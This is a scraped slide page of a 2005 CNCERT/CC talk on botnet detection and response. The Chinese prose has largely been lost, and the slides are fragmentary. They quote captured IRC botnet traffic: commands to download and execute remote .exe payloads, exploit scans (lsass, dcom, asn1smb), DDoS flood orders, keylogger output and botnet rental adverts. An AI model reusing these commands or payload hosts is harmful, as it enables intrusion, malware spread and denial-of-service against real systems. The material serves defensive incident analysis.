If you can't read please download the document
Upload
lilike
View
93
Download
17
Embed Size (px)
DESCRIPTION
CNCERT/CC 关于僵尸网络的 应对措施. 国家计算机网络应急技术处理协调中心 陈明奇 博士 2005 年 11 月 17 日 天津. 摘要. 第一部分 背景 第二部分 发现和处置 第三部分 CNCERT/CC 的工作 监测情况和活动规律 应对措施 第四部分 实际案例分析. 一 背景. 网络安全的传统三大威胁: 病毒 / 木马 / 蠕虫( Virus/Trojan/Worm ) 拒绝服务攻击( DoS/DDoS ) 垃圾邮件 ( Spam ). 黑客 —— 动机的改变: 以经济利益为驱动,不再追求轰动性效果带来的名声和炫耀技巧 - PowerPoint PPT Presentation
Citation preview
CNCERT/CC
20051117
National Computer network Emergency Response technical Team/Coordination Center of China
CNCERT/CC
National Computer network Emergency Response technical Team/Coordination Center of China
//Virus/Trojan/WormDoS/DDoS Spam
National Computer network Emergency Response technical Team/Coordination Center of China
APWG VENDER(MS, AV company)2004ISP ComcastComcast888ComcastBotNet TrendLabs20049923.5200410 SANS DoS 4200411APWG,PhishingBotNet2004KorgoGaoBotSdBotBotNet3WittyCaidaBotNet100
National Computer network Emergency Response technical Team/Coordination Center of China
Botnet
3.6 cents per bot week
6 cents per bot weekSeptember 2004 postings to SpecialHam.com, Spamforum.biz
20047Zombie103(BotNet)(phishing)100 >20-30k always online SOCKs4, url is de-duped and updated every >10 minutes. 900/weekly, Samples will be sent on request. >Monthly payments arranged at discount prices.>$350.00/weekly - $1,000/monthly (USD) >Type of service: Exclusive (One slot only)>Always Online: 5,000 - 6,000>Updated every: 10 minutes
National Computer network Emergency Response technical Team/Coordination Center of China
IRCHoneypot)honeynet project
IDS+IRC863917 BOTbot botbot DdoSVax
National Computer network Emergency Response technical Team/Coordination Center of China
IRC
National Computer network Emergency Response technical Team/Coordination Center of China
IPport (): channel()Host.login passhostbotBotlogin.update.download.uninstall
National Computer network Emergency Response technical Team/Coordination Center of China
1() 2 ()
1C&C 2;
BotBOT?
National Computer network Emergency Response technical Team/Coordination Center of China
CNCERT/CCTop 563919593
hotgirls29624ipscan s.s.s.s dcom2 86400 256 8000 sdcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e s(df.exedefrag32)
National Computer network Emergency Response technical Team/Coordination Center of China
(200563-6 23)IRC C&C Server : 34 :18; :5; :4; :2; :2; 1;: 1; :1.
Chart3
48911
57262
50209
41912
17240
22911
20418
15237
Statistics of user clients of large scale botnets
BOTNET
bothunter6/22/05
IP
20050603#NT#24.14.213.135##NT##1128NTExploitingIP
#NULLROOT#
#liquid#
#OMGLOLBBQ#
#hotgirls#80.191.168.20#hotgirls#39084dcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -sdf.exedefrag32
209.200.13.84
80.191.168.20
#veryhotgirls#
##pwned##207.105.182.101##pwned##2948##y00## Dowmloanding update from
##y00##http://65.75.134.170/~wxware/test/Service.exer
#Hellas195.204.1.132#Hellas5751
#
48911
20050608#fat fuckoffh00ker81.74.132.235#fat fuckoffh00ker192Download http://sentinel.sp1d3y.nl/own2.exeha.exeNTIP
#visitors tricky
#xt-nt fuckoffh00ker
#hotgirls#80.191.168.20#hotgirls#39000dcombot* wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -sdf.exedefrag32
209.200.13.84
80.191.168.20
#veryhotgirls#
#master#220.151.115.232#master#6265
##NT##24.14.213.135##NT##5046IP Exploit
#OMGLOBBQ##NULLROOT# [DDOS]Flooding :(216.73.112.201) for
#NULLROOT#650 seconds
#lc-wks202.67.155.250#lc-wks5640NTIP
#SeR 654321211.221.205.58#SeR1119IP 445 FTP
57262
20050610#omgyay 0mg207.58.134.228#omgyay 0mg332ExploitingIP
#hotgirls#80.191.168.20#hotgirls#27014dcombot* wormride -s -t
209.200.13.84
80.191.168.20
#veryhotgirls#
#Brappy81.75.86.50#oG#10271
#hipsi sdadfasd23dfadas423
#Brappy
#12a asdasfGTSdzszsar3
#13b sdadfasd23dfadas423
##NT##24.14.213.135##NT##2874NTIP Exploit
222.104.230.23#OMGLOBBQ##NULLROOT# [DDOS]Flooding :(216.73.112.20180) for
#NULLROOT#650 seconds
#lc-wks202.67.155.250#lc-wks3132NTIP
#SeR 654321211.221.205.58#SeR 6543216586IP 445 FTP
209.170.170.16#For3#
#fearme#
50209
20050613#omgyay 0mg207.58.134.228#omgyay 0mg796ExploitingIP67.39.199.177218.56.76.142
67.39.199.177#Gunzup Robpwns67.39.199.177218.56.76.142
218.55.76.142cmd=PRIVMSG;para=#:[UPDATE]:Downloading update from: http://www.reznzdr.com/rBot.exe;
cmd=PRIVMSG;para=#:[UPDATE]:Downloading update from: http://www.reznzdr.com/asnstolen.exe;
#Gunzup Robpwns IP61.174.215.9#SeR 654321IP211.23.16.105
#hotgirls#80.191.168.20#hotgirls#29624dcombot* wormride -s -t
209.200.13.84
80.191.168.20
#veryhotgirls#
##master##208.53.169.142#Master1133##master##IP 207.108.170.75
207.167.215.35##master##
207.108.170.75##xanax##Downloading update from: http://65.75.134.170/~wxwarez/test/Service.exe
207.164.223.19##Go.DJ####xanax##IP 208.53.169.142[DOWNLOAD]:Link o Dns Not Trovato SUKKIAMELO!:
130.239.38.130http://ciudad.lationl.com/777/reelay.exe
#!pwn 133766.45.255.131#!pwn 1337
#.b0tz elite7359NTIP Exploit
#spyware FBISUCK#spyware Downloading http://s119796543.onlinehome.us/Lower.exe..;
#asnexhttp://s119796543.onlinehome.us/tc.exe..;
#asnhttp://s119796543.onlinehome.us/yoursite.exe..;
#!pwn-roothttp://s119796543.onlinehome.us/tc.exe..;
66.45.255.131KEYLOG
cmd=PRIVMSG;para=#phattykeylog: (-Micros) [Del][CTRL] (Changed window)
#SeR 654321211.221.205.58#SeR 6543213000IP 445 FTP
#For3#
#fearme#
41912
20050615#hotgirls#80.191.168.20#hotgirls#10018dcombot* wormride -s -t
209.200.13.84
80.191.168.20
#veryhotgirls#
#betty218.207.9.11#betty4805IPDcomIPNT
##WHOR3Z###betty DDOS
##FBOMED#cmd=PRIVMSG;para#betty : [SYN] Flooding : (24.62.139.80)for 111111111 seconds
cmd=PRIVMSG;para#betty :[DOWNLOAD] : Link o Dns Non Trovato SUKKIAMEL! : http//www.tapionirc.altervista.org/mh.exe
#ne061.167.82.194#ne0151IP ,DcomIP
#n03cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e
#ne0n
##master##207.168.215.35##master##1606IP
38.115.133.226##pwned####pwend##
207.164.233.19##y00####master##
213.88.181.70##fatality##cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot
#!pwn 133766.45.255.131#!pwn 1337660NTIP Exploit
#.b0tz elite#spyware Downloading http://s119796543.onlinehome.us/Lower.exe..;
#spyware FBISUCKhttp://s119796543.onlinehome.us/tc.exe..;
#asnexhttp://s119796543.onlinehome.us/mt.exe.
#asn
#!pwn-root
17240
20050617##master##207.168.215.35##master##1321IP
38.115.133.226##pwned####master## cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot
207.164.233.19##y00####y00##FTP
##fatality##
#betty b1xvgf218.207.9.11#fbomed#10242##fbomed## [DDoS]:Flooding: (67.159.18.197:6667) for 300 seconds
#betty b1xvgf#boilerhouse# Dcom135lIP
#boilerhouse flash218.207.9.1181.230.22.5180.100.68.87
81.230.22.51 ###LeoNarDo###
80.100.22.51 #.#smash3r#.#
1211
#hotgirls80.191.168.20#hotgirls6338
61.152.146.238#veryhotgirlsdcombot
209.200.13.84* wormride -s -t
24.21.203.98
24.184.193.250
209.200.13.84
#ne061.167.82.194#ne087IP ,DcomIP
#n03
#ne0ncmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e
cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.goa_irc.co.uk/wosten/new4.exe to new4.exe
#bitch fuckinghoe210.108.10.150#bitch fuckinghoe4923
211.226.12.159#blah
#bleh
#h2o pizpwna
#meh nizzle
#test fuckinghoe
22911
20050620#ne061.1673.82.194#ne028
##xdcc##
##ownage##
#hotgirls209.200.13.84#hotgirls13049dcombot
61.153.201.2#veryhotgirls
218.22.25.142#xotgipls
#NULLROOT222.104.230.41#NULLROOT#295
#OMGLOLBBQ#
#kush#
#AIM#24.14.213.135#AIM# AOLOL83
#0x7f shameep
#12a asdasfGTSdzszsar3211.78.141.148#12a asdasfGTSdzszsar3;6963
#13b sdadfasd23dfadas423;
#ago-priv trouble;
#brap rotasgobrap;
#brappy asd3sadasdsadgfsd;
#decomp sdadfasd23dfadas423;
#fbsd lovesme;
#FC asdasfGTSdzszsar3;
#fuk3d lovesme;
#hipsi sdadfasd23dfadas423;
#hound lovesme;
#linux lovesme;
#marissa lovesme;
#n0 3nt3r;
#newmsn pass;
#nicole.com lovesme;
#nix lovesme;
#oG# unknown;
#ssh lovesme;
#tX lovesme;
20418
20050622#fbomed#218.207.9.11##fbomed## FUCK3R4014
#sluTTy# p1mp3d
#betty b1xvgf
#boilerhouse flash
#eWg-BOT
#NULLROOT222.104.230.41#NULLROOT#729
#OMGLOLBBQ#
#OMG#
#hotgirls209.200.13.84#hotgirls6322dcomb
61.153.201.2#veryhotgirls
#omgyay66.45.249.155#Gunzup Robpwns99IP
#omgyay 0mg
#12a asdasfGTSdzszsar3211.78.141.148#12a asdasfGTSdzszsar3;4073
#13b sdadfasd23dfadas423;
#ago-priv trouble;
#brap rotasgobrap;
#brappy asd3sadasdsadgfsd;
#decomp sdadfasd23dfadas423;
#fbsd lovesme;
#FC asdasfGTSdzszsar3;
#fuk3d lovesme;
#hipsi sdadfasd23dfadas423;
#hound lovesme;
#linux lovesme;
#marissa lovesme;
#n0 3nt3r;
#newmsn pass;
#nicole.com lovesme;
#nix lovesme;
#oG# unknown;
15237
1234567891011121314151617
hotgirlsbettyNULLROOTbitch fuckinghoeBrappyfat fuckoffh00kerHellaslc-wksmasterne0NTomgyay 0mgpwn 1337pwnedSeR 654321AIM12a asdasfGTSdzszsar3
reserved-38506x1f
reserved-38511x1f
reserved-38513x1f
reserved-38516x1f
reserved-38518x1f
reserved-38520x1f
reserved-38523x1f
IP
20050618-20050620#ne061.167.82.194cmd=TOPIC;para=#ne0 : download http://goa-irc.co.uk/wosten/new3.exe 1;
##xdcc##
##ownage##
20050620-20050622#fbomed#218.207.9.11cmd=PRIVMSG;para=#eWg-BOT:.(UPDATE):Downloading update from :http://champion.altervista.org/suk.exe
IP
210.108.10.15020
211.221.205.585
211.226.12.1594
218.55.76.1422
222.104.230.232
207.58.134.2281
207.105.182.1011
207.108.170.751
207.164.223.191
207.164.233.19
207.167.215.3535
207.168.215.35
207.58.134.228
208.53.169.142
209.170.170.16
209.200.13.84
24.14.213.135
24.184.193.250
24.21.203.98
38.115.133.226
66.45.255.131
67.39.199.177
80.191.168.20
195.204.1.132
220.151.115.232
130.239.38.130
213.88.181.70
202.67.155.250
81.74.132.235
81.75.86.50
61.167.82.194
218.207.9.11
61.152.146.238
61.167.82.194
211.78.141.148
24.14.213.135
66.45.249.155
38506.048911
38511.057262
38513.050209
38516.041912
38518.017240
38520.022911
38523.020418
38525.015237
Statistics of user clients of large scale botnets
#hotgirls#
38,50639084
38,51139000
38,51327014
38,51629624
38,51810018
38,5206338
38,52313049
38,5256322
Hotgirls
National Computer network Emergency Response technical Team/Coordination Center of China
15(2005819919)
Chart2
157142
83263
53366
18753
25795
17333
24054
23266
19906
21498
diablo
Sheet2
Sheet1
IP
1!cz2cezkareserved-38583x1fDiablo157142205.209.149.40
2!pwn1337reserved-38586x1f83263
3123456789reserved-38588x1f53366
412aasdasfGTSdzszsar3reserved-38590x1f18753
5aabcreserved-38593x1f25795
6AIMreserved-38595x1f17333
7asnreserved-38597x1f24054
8asnFBISUCKreserved-38602x1f23266
9bbotreserved-38609x1f19906
10bettyreserved-38614x1f21498
11bettyb1xvgf
12bitchfuckinghoe
13blah
14boilerhouseflash
15Brappy
16CaMz-R
17com
18dd0s
19diablo
20DWdepth
21Eddie
22fatassfat20
23fatfuckoffh00ker
24fbomed
25h2
26hellas
27hotgirls
28lc-wks
29Master
30MP3
31msn
32ne0
33NewBot
34NT
35NULLROOT
36omgyay
37omgyay0mg
38phat
39phatbot
40pwned
41ruff
42SeR654321
43sKull
44staff
45wubix
45
2005.06.032005.09.19
Sheet1
diablo
Sheet3
157142
National Computer network Emergency Response technical Team/Coordination Center of China
gunit
829 12PRIVMSG #asnftp :.login booties -s;cmd=:[email protected] #nesebot :.login nesebot -s;cmd=:gunit!DIE@nesePRIVMSG #urxbot :.login prx -s;cmd=:[email protected];TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit;TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=:gunit;(2005829)
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)botnet creation) Deloder/Mytob/Zotob 2005.9.18 9:00 332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe the [botz]-96018 67.43.*.*:6667 JOIN #suce fuck. :r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a b
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)botnet spreadTOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b sTOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r sTOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.xTOPIC #XOwneD :!ntscan 350 1000 -a -b;TOPIC #111 :.advscan lsass_445 100 5 120 -r332 nffe #fanta :.scan pnp 50 6000 221332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r;332 #tvr0x :^advscan dcom135 300 5 0 -r s332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!332 ...#r00x %advscan dcom135 300 5 0 -r -b s332 ...#asn :.scanall s332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r s332 ...#.pwnt. :.xscan msass 300 5 0 -b -s;332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r s332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)botnet transfer1. IRC Server()2. IRC Server;3. IRC ServerBot2005927
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)botnet updateBotTOPIC PRIVMSG 2005.9.18 8.am:[email protected] #hb3 :.hell.download http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e;cmd=;TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exePRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolenBot 20050919 02NotaBot:
PRIVMSG #NotaBot :.spread.remove.module mssql\r\nPRIVMSG #NotaBot :.spread.remove.module dcom1\r\nPRIVMSG #NotaBot :.spread.add.module vnc_scan\r\nPRIVMSG #NotaBot :.spread.add.module radmin_empty\r\n
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)Botnet Activity spyware
220050919 12PRIVMSG #NotaBotslog :[ VNC Found ] :218.14. *.*:111111 //VNC
PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty//
0927 20 TOPIC ##bla :.ddos.random 81.169. *.* 80 120//
National Computer network Emergency Response technical Team/Coordination Center of China
(Life Cycle)Botnet decease
1C&C servers()DDNS /DNS
2C&C serverbot
3 bot
4
5( .remove/.uninstall)
6bot
National Computer network Emergency Response technical Team/Coordination Center of China
CNCERT/CC1 200412863-917IRC BotNet2 IRC BotNet20057Honeypot3 BotNet4 BotNet,Bot5 Bot,6 ,Bot
National Computer network Emergency Response technical Team/Coordination Center of China
DDOS
1
2DDOSBotNet
National Computer network Emergency Response technical Team/Coordination Center of China
() BKDR_VB.CQ
\urlHTTPSMTP
National Computer network Emergency Response technical Team/Coordination Center of China
() IRC
anthony.ipv6.usr.aswind.com peter.freehost.aswind.net carlyle.dns2go.aswind.net khond.vip.vhost.ourmidi.com lamen.vhost.ourmidi.com massuse.ipv6.free.ourmidi.net bruce.free.ourmidi.net john.usr.aswind.com
National Computer network Emergency Response technical Team/Coordination Center of China
IP
216.152.*.*6667 212.204.*.* 6667 64.12.*.* 6667 207.68.*.* 6667 61.197.*. * 8000 218.157. *. * 443 221.146. *. * 554 219.153. *. * 8000
202.108.*.*IP
National Computer network Emergency Response technical Team/Coordination Center of China
()
BotNet
12106000080003712
IP60.2.*.*ADSL
National Computer network Emergency Response technical Team/Coordination Center of China
()() 1171641 IPBKDR_VB.CQ156120
National Computer network Emergency Response technical Team/Coordination Center of China
()215521(200412132005110)
National Computer network Emergency Response technical Team/Coordination Center of China
()
CNCERT/CC
National Computer network Emergency Response technical Team/Coordination Center of China
()
() BotNet 1CNCERT http://www.cert.org.cn/articles/tools/common/2004123022037.shtml 2
National Computer network Emergency Response technical Team/Coordination Center of China
()3
National Computer network Emergency Response technical Team/Coordination Center of China
rasinf.exe,ipxsrv.exeipxsrv.exe,QQ,IEipxsrv.exe, msapp.exerasinf.exe, rasinf.exeIPCKuang2kuang2(k2.exe)kuang2msapp.exe.1200223200410 Botnet
National Computer network Emergency Response technical Team/Coordination Center of China
1 C&C Server2 Bot3 C&C Server4 5 botnet
National Computer network Emergency Response technical Team/Coordination Center of China
CNCERT/CCWEBSITE: WWW.ORG.CNTEL: 8299 0999 () +86-10-8299 1000EMAIL:[email protected]
National Computer network Emergency Response technical Team/Coordination Center of China
BotNet2004BotNetSpamDDosBotBotnet BotNet200420033
DDoSIdentity theftbotbotHoneywallbot200411200531HoneyWall1mwcollect[8],18030550080020041120051406Ddos179[4]
1bot(fast joining bots) botsIRCIRC2) bot(Long standing connection) botsbot(not talkative)Botsbotping/pongDdoSVax[5]BotIDSbotbotbotbotbot,IDSIRCIDSIRCBotIRCIRC RFCIDSbotIRCIRCIDSbotIDSsocks v4ServerTOPIC #rBot :.advscan lsass 200 5 0 -r sa->TOPIC#rBot :.advscan lsass 200 5 0 -r s\nb->TOPIC#rBot :.advscan lsass 200 5 0 -r s\nc) Botnetbot